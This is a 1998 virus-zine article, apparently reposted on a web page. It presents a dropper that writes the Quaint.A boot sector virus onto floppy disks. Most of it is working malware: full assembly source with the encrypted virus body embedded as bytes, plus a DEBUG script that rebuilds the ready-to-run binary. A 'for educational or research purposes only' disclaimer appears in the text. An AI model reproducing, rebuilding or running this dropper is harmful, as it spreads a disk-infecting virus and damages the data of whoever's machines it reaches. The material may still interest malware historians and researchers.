Copy Link
Add to Bookmark
Report
Hexfiles Issue 2 File 013
HEX-FILES No. 2 File 013
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Quaint Virus Dropper
~~~~~~~~~~~~~~~~~~~~
This program drops the Quiant.A virus in the boot sector of a
diskette in drive A:.
How it works
* Accesses the diskette and reads the boot sector. The program
assumes that your computer has a diskette drive. A failure may mean
any of the following:
- there is no diskette in drive A:;
- the diskette is not properly inserted in the drive or the
drive door is open;
- the diskette is defective, not formatted or is of
incompatible format;
- the BIOS is at a loss on the diskette you have on the drive;
and
- a tsr program is interfering with the read.
* Checks whether the diskette is already infected by Quaint.A.
If so, the program terminates.
* Verifies if the diskette has a valid bpb. Validity is
ascertained by checking for the media descriptor byte. Some virii
do not preserve the bpb.
* Based on the content of the bpb, determines where to save the
original boot sector. Routine used was lifted from the virus code.
* Saves the original boot sector. If the save fails, it means
that the diskette is write-protected or another program, viral
and non-viral, is protecting that sector from being overwritten.
* Drops the virus.
* Terminates.
The program prints a message on what happened on, or the result of
the program run. It also returns an exit code on termination that
could be tested in a batch file.
The exit codes are as follows:
0 Successfully dropped the Quaint.A virus
1 Disk is already infected with Quaint.A virus
2 Read of boot sector failed. (Disk could not be accessed.)
4 Saving the original boot sector failed
3 Invalid media descriptor byte
5 Writing the virus to the boot sector failed
This Quaint virus dropper will be updated to handle Quaint.B as soon
as I get a copy of this other variant.
ÄÄ QUAINT-A.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Quaint segment 'code'
assume cs:Quaint, ds:Quaint
org 100h
Start: jmp ShowProgName
;----------------------------------------------------------------------------
;Quaint.A code. We will dump it because most of it are encrypted.
;----------------------------------------------------------------------------
Jumper dw 3eebh
QuaintCode db 0B8h,3Eh,0AFh,35h,76h,65h,5,7Ch,34h,95h,0BFh,8Bh,0,8Bh
db 0CDh,0D3h,0C7h,8Bh,0DFh,2Eh,8Bh,0BEh,0BCh,7Dh,3,0FBh,2Eh
db 89h,0BEh,0BCh,7Dh,8Bh,0F5h,8Bh,0DEh,81h,0EBh,24h,0ACh
db 0B1h,7,0D3h,0CBh,8Bh,0EBh,8Bh,0DDh,0B1h,7,0D3h,0C3h,81h
db 0C3h,26h,0ACh,8Bh,0EBh,75h,0CFh,0B8h,9,32h,33h,0C7h,38h
db 0F8h,40h,3Bh,33h,35h,8Ch,0ACh,0F7h,5Eh,0F1h,43h,0,2Eh
db 0E7h,1,1,0FEh,13h,0C3h,8Eh,3Ah,31h,0D3h,0B0h,0DFh,0DEh
db 0C6h,0BAh,4Bh,5Bh,6Bh,9Eh,0F3h,0F9h,0FFh,1,68h,0A2h,7Fh
db 8Dh,0FBh,9Bh,6Dh,75h,5,29h,0C9h,0DBh,0D6h,28h,0F7h,0,93h
db 5,8Fh,0F8h,0CBh,0E4h,92h,0A7h,0E3h,0A1h,11h,38h,0Ah,40h
db 4Fh,0F7h,40h,0E6h,0ECh,0F8h,7,0DFh,42h,60h,0Dh,6,0F4h,9
db 0F9h,40h,0C8h,3,5Dh,7,0D4h,0B0h,51h,0E0h,0DBh,83h,0E7h
db 98h,0FEh,13h,2Ah,36h,97h,2,75h,82h,0A6h,70h,77h,68h,87h
db 85h,97h,26h,0F5h,0B7h,0Dh,43h,24h,0Eh,7,89h,1Bh,9,98h,8Fh
db 44h,48h,0E8h,0D7h,0BFh,0E9h,0EEh,0B7h,0F5h,8Ah,3Fh,97h
db 0CBh,6Fh,6Ah,1Fh,0CAh,5Dh,58h,5Eh,0E0h,0E2h,0BAh,0C0h
db 0D9h,2,0E9h,3,54h,0F4h,5Ah,53h,47h,0F9h,0F5h,49h,1,0D3h
db 0F0h,41h,52h,7Fh,5Dh,0B1h,0D3h,6Ah,0C6h,0FCh,96h,0CBh,51h
db 25h,4Eh,4Ch,0FEh,5Fh,0C5h,0ABh,74h,77h,0E8h,0B7h,10h,0DDh
db 78h,26h,0FFh,0D5h,72h,56h,30h,0C9h,0DDh,2,0E9h,51h,57h
db 0BFh,60h,53h,2Fh,0,37h,0BCh,85h,4Fh,6Ah,6Ah,9Ch,55h,1Fh
db 31h,93h,0F6h,51h,53h,4Ch,2Dh,0EBh,12h,39h,40h,6Ch,77h,16h
db 7,0EAh,0FFh,1Ah,0E0h,0B3h,0DDh,0B2h,0A2h,80h,93h,0FCh
db 51h,4Ch,0EAh,0D5h,75h,99h,83h,0D3h,6Ch,56h,0C6h,89h,74h
db 0F5h,47h,18h,0Eh,5Eh,41h,6Ah,7Fh,0B5h,0B7h,92h,0F8h,49h
db 0D1h,6Eh,1Ah,0C7h,0DBh,0E8h,8Eh,29h,36h,1Fh,0E8h,0A7h
db 0FDh,0BCh,33h,4Fh,36h,99h,0CFh,5Dh,33h,1Dh,4Bh,0C2h,42h
db 0DDh,0EAh,0E9h,5,44h,0F8h,3,10h,0Ch,0F9h,0BFh,49h,34h
db 0DDh,6Eh,52h,67h,47h,8Ch,96h,14h,6Ch,7Ch,26h,0B4h
QuaintCodeLen equ $- QuaintCode
;----------------------------------------------------------------------------
;Program messages.
;----------------------------------------------------------------------------
OpenStatement db 13,10,'Quaint Virus Dropper',13,10,10
db 'HEX-FILES No. 2',13,10,' $'
db '1998 (c) Putoksa Kawayan',13,10,10
db 'HEX-FILES and Putoksa Kawayan are not responsible '
db 'for all actual, implied and',13,10
db 'imaginary damage brought about by the use, misuse '
db 'or non-use of this virii.',13,10
db 'Anybody who executes this virii bears full '
db 'responsibility for any untoward',13,10
db 'incident that may occur.',13,10,10
db 'This virii is strictly for educational '
db 'or research purposes only.',13,10,10,'$'
ErrorRead db 'Could not access diskette.',13,10
db 'Quaint drop failed.',13,10,10,'$'
ErrorSave db 'Could not save original boot sector.',13,10
db 'Quaint drop aborted.',13,10,10,'$'
ErrorWrite db 'Could not write to boot sector.',13,10
db 'Quaint drop aborted.',13,10,10,'$'
InvalidMdb db 'Disk has unknown media descriptor byte.',13,10
db 'Quaint drop aborted.',13,10,10,'$'
FoundQuaint db 'Quaint is already on disk.',13,10
db 'Quaint drop aborted.',13,10,10,'$'
Success db 'Diskette is now infected with Quaint.',13,10,10,'$'
;----------------------------------------------------------------------------
;Show program ID.
;----------------------------------------------------------------------------
ShowProgName: mov dx,offset OpenStatement
mov ah,9
int 21h
;----------------------------------------------------------------------------
; Read disk boot sector.
;----------------------------------------------------------------------------
mov bp,3
mov bx,offset ReadBuffer
mov cx,1
mov dx,0
ReadAgain: mov ax,201h
int 13h
jnc InfectCheck
mov ah,0
int 13h
dec bp
jnz ReadAgain
mov dx,offset ErrorRead
mov ah,9
int 21h
mov ax,4c02h
int 21h
;----------------------------------------------------------------------------
; Determine if Quaint is already on disk.
;----------------------------------------------------------------------------
InfectCheck: cmp word ptr [bx],3eebh
jne NotInfected
lea di,[bx+40h]
mov si,offset QuaintCode
mov cx, QuaintCodeLen
cld
repe cmpsb
jne NotInfected
mov dx,offset FoundQuaint
mov ah,9
int 21h
mov ax,4c01h
int 21h
;----------------------------------------------------------------------------
; Verify disk's media descriptor byte. This serves as check if the disk
; contains a valid bpb.
;----------------------------------------------------------------------------
NotInfected: mov al,[bx+21] ; get bpb media descriptor byte
and al,0f0h
cmp al,0f0h
je MediaByteOk
mov dx,offset InvalidMdb
mov ah,9
int 21h
mov ax,4c03h
int 21h
;----------------------------------------------------------------------------
; This is the routine that determines the location of the last sector of
; the root directory. This is a direct lift from the virii code.
;----------------------------------------------------------------------------
MediaByteOk: mov al,[bx+16]
cbw
mul word ptr [bx+22]
add ax,[bx+14]
xchg dx,ax
mov ax,[bx+17]
dec ax
mov cl,4
shr ax,cl
add ax,dx
cwd
div word ptr [bx+24]
mov cl,dl
cwd
div word ptr [bx+26]
inc cx
mov ch,al
mov dh,dl
mov dl,0
mov bp,3
;----------------------------------------------------------------------------
; We are going to save the original boot sector first before we write to
; the boot sector. It is possible for you to lose some entry in the root
; directory.
;----------------------------------------------------------------------------
SaveAgain: mov ax,301h
int 13h
jnc SaveOk
mov ah,0
int 13h
dec bp
jnz SaveAgain
mov dx,offset ErrorSave
mov ah,9
int 21h
mov ax,4c04h
int 21h
;----------------------------------------------------------------------------
; Set up virii boot sector... and write.
;----------------------------------------------------------------------------
SaveOk: lea di,[bx+40h]
mov si,offset Jumper
mov cx,QuaintCodeLen
lodsw
mov [bx],ax
cld
rep movsb
mov dx,cx
inc cx
mov bp,3
WriteAgain: mov ax,301h
int 13h
jnc DoneDrop
mov ah,0
int 13h
dec bp
jnz WriteAgain
mov dx,offset ErrorWrite
mov ah,9
int 21h
mov ax,4c05h
int 21h
DoneDrop: mov dx,offset Success
mov ah,9
int 21h
mov ax,4c00h
int 21h
ReadBuffer:
Quaint ends
end Start
ÄÄ QUAINT-A.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄ QUAINT-A.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
N QUAINT-A.COM
E 0100 E9 53 04 EB 3E B8 3E AF 35 76 65 05 7C 34 95 BF
E 0110 8B 00 8B CD D3 C7 8B DF 2E 8B BE BC 7D 03 FB 2E
E 0120 89 BE BC 7D 8B F5 8B DE 81 EB 24 AC B1 07 D3 CB
E 0130 8B EB 8B DD B1 07 D3 C3 81 C3 26 AC 8B EB 75 CF
E 0140 B8 09 32 33 C7 38 F8 40 3B 33 35 8C AC F7 5E F1
E 0150 43 00 2E E7 01 01 FE 13 C3 8E 3A 31 D3 B0 DF DE
E 0160 C6 BA 4B 5B 6B 9E F3 F9 FF 01 68 A2 7F 8D FB 9B
E 0170 6D 75 05 29 C9 DB D6 28 F7 00 93 05 8F F8 CB E4
E 0180 92 A7 E3 A1 11 38 0A 40 4F F7 40 E6 EC F8 07 DF
E 0190 42 60 0D 06 F4 09 F9 40 C8 03 5D 07 D4 B0 51 E0
E 01A0 DB 83 E7 98 FE 13 2A 36 97 02 75 82 A6 70 77 68
E 01B0 87 85 97 26 F5 B7 0D 43 24 0E 07 89 1B 09 98 8F
E 01C0 44 48 E8 D7 BF E9 EE B7 F5 8A 3F 97 CB 6F 6A 1F
E 01D0 CA 5D 58 5E E0 E2 BA C0 D9 02 E9 03 54 F4 5A 53
E 01E0 47 F9 F5 49 01 D3 F0 41 52 7F 5D B1 D3 6A C6 FC
E 01F0 96 CB 51 25 4E 4C FE 5F C5 AB 74 77 E8 B7 10 DD
E 0200 78 26 FF D5 72 56 30 C9 DD 02 E9 51 57 BF 60 53
E 0210 2F 00 37 BC 85 4F 6A 6A 9C 55 1F 31 93 F6 51 53
E 0220 4C 2D EB 12 39 40 6C 77 16 07 EA FF 1A E0 B3 DD
E 0230 B2 A2 80 93 FC 51 4C EA D5 75 99 83 D3 6C 56 C6
E 0240 89 74 F5 47 18 0E 5E 41 6A 7F B5 B7 92 F8 49 D1
E 0250 6E 1A C7 DB E8 8E 29 36 1F E8 A7 FD BC 33 4F 36
E 0260 99 CF 5D 33 1D 4B C2 42 DD EA E9 05 44 F8 03 10
E 0270 0C F9 BF 49 34 DD 6E 52 67 47 8C 96 14 6C 7C 26
E 0280 B4 0D 0A 51 75 61 69 6E 74 20 56 69 72 75 73 20
E 0290 44 72 6F 70 70 65 72 0D 0A 0A 48 45 58 2D 46 49
E 02A0 4C 45 53 20 4E 6F 2E 20 32 0D 0A 31 39 39 38 20
E 02B0 28 63 29 20 50 75 74 6F 6B 73 61 20 4B 61 77 61
E 02C0 79 61 6E 0D 0A 0A 48 45 58 2D 46 49 4C 45 53 20
E 02D0 61 6E 64 20 50 75 74 6F 6B 73 61 20 4B 61 77 61
E 02E0 79 61 6E 20 61 72 65 20 6E 6F 74 20 72 65 73 70
E 02F0 6F 6E 73 69 62 6C 65 20 66 6F 72 20 61 6C 6C 20
E 0300 61 63 74 75 61 6C 2C 20 69 6D 70 6C 69 65 64 20
E 0310 61 6E 64 0D 0A 69 6D 61 67 69 6E 61 72 79 20 64
E 0320 61 6D 61 67 65 20 62 72 6F 75 67 68 74 20 61 62
E 0330 6F 75 74 20 62 79 20 74 68 65 20 75 73 65 2C 20
E 0340 6D 69 73 75 73 65 20 6F 72 20 6E 6F 6E 2D 75 73
E 0350 65 20 6F 66 20 74 68 69 73 20 76 69 72 69 69 2E
E 0360 0D 0A 41 6E 79 62 6F 64 79 20 77 68 6F 20 65 78
E 0370 65 63 75 74 65 73 20 74 68 69 73 20 76 69 72 69
E 0380 69 20 62 65 61 72 73 20 66 75 6C 6C 20 72 65 73
E 0390 70 6F 6E 73 69 62 69 6C 69 74 79 20 66 6F 72 20
E 03A0 61 6E 79 20 75 6E 74 6F 77 61 72 64 0D 0A 69 6E
E 03B0 63 69 64 65 6E 74 20 74 68 61 74 20 6D 61 79 20
E 03C0 6F 63 63 75 72 2E 0D 0A 0A 54 68 69 73 20 76 69
E 03D0 72 69 69 20 69 73 20 73 74 72 69 63 74 6C 79 20
E 03E0 66 6F 72 20 65 64 75 63 61 74 69 6F 6E 61 6C 20
E 03F0 6F 72 20 72 65 73 65 61 72 63 68 20 70 75 72 70
E 0400 6F 73 65 73 20 6F 6E 6C 79 2E 0D 0A 0A 24 43 6F
E 0410 75 6C 64 20 6E 6F 74 20 61 63 63 65 73 73 20 64
E 0420 69 73 6B 65 74 74 65 2E 0D 0A 51 75 61 69 6E 74
E 0430 20 64 72 6F 70 20 66 61 69 6C 65 64 2E 0D 0A 0A
E 0440 24 43 6F 75 6C 64 20 6E 6F 74 20 73 61 76 65 20
E 0450 6F 72 69 67 69 6E 61 6C 20 62 6F 6F 74 20 73 65
E 0460 63 74 6F 72 2E 0D 0A 51 75 61 69 6E 74 20 64 72
E 0470 6F 70 20 61 62 6F 72 74 65 64 2E 0D 0A 0A 24 43
E 0480 6F 75 6C 64 20 6E 6F 74 20 77 72 69 74 65 20 74
E 0490 6F 20 62 6F 6F 74 20 73 65 63 74 6F 72 2E 0D 0A
E 04A0 51 75 61 69 6E 74 20 64 72 6F 70 20 61 62 6F 72
E 04B0 74 65 64 2E 0D 0A 0A 24 44 69 73 6B 20 68 61 73
E 04C0 20 75 6E 6B 6E 6F 77 6E 20 6D 65 64 69 61 20 64
E 04D0 65 73 63 72 69 70 74 6F 72 20 62 79 74 65 2E 0D
E 04E0 0A 51 75 61 69 6E 74 20 64 72 6F 70 20 61 62 6F
E 04F0 72 74 65 64 2E 0D 0A 0A 24 51 75 61 69 6E 74 20
E 0500 69 73 20 61 6C 72 65 61 64 79 20 6F 6E 20 64 69
E 0510 73 6B 2E 0D 0A 51 75 61 69 6E 74 20 64 72 6F 70
E 0520 20 61 62 6F 72 74 65 64 2E 0D 0A 0A 24 44 69 73
E 0530 6B 65 74 74 65 20 69 73 20 6E 6F 77 20 69 6E 66
E 0540 65 63 74 65 64 20 77 69 74 68 20 51 75 61 69 6E
E 0550 74 2E 0D 0A 0A 24 BA 81 02 B4 09 CD 21 BD 03 00
E 0560 BB 36 06 B9 01 00 BA 00 00 B8 01 02 CD 13 73 13
E 0570 B4 00 CD 13 4D 75 F2 BA 0E 04 B4 09 CD 21 B8 02
E 0580 4C CD 21 81 3F EB 3E 75 1A 8D 7F 40 BE 05 01 B9
E 0590 7C 01 FC F3 A6 75 0C BA F9 04 B4 09 CD 21 B8 01
E 05A0 4C CD 21 8A 47 15 24 F0 3C F0 74 0C BA B8 04 B4
E 05B0 09 CD 21 B8 03 4C CD 21 8A 47 10 98 F7 67 16 03
E 05C0 47 0E 92 8B 47 11 48 B1 04 D3 E8 01 D0 99 F7 77
E 05D0 18 8A CA 99 F7 77 1A 41 88 C5 88 D6 B2 00 BD 03
E 05E0 00 B8 01 03 CD 13 73 13 B4 00 CD 13 4D 75 F2 BA
E 05F0 41 04 B4 09 CD 21 B8 04 4C CD 21 8D 7F 40 BE 03
E 0600 01 B9 7C 01 AD 89 07 FC F3 A4 8B D1 41 BD 03 00
E 0610 B8 01 03 CD 13 73 13 B4 00 CD 13 4D 75 F2 BA 7F
E 0620 04 B4 09 CD 21 B8 05 4C CD 21 BA 2D 05 B4 09 CD
E 0630 21 B8 00 4C CD 21
RCX
0536
W
Q
ÄÄ QUAINT-A.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
EoF.
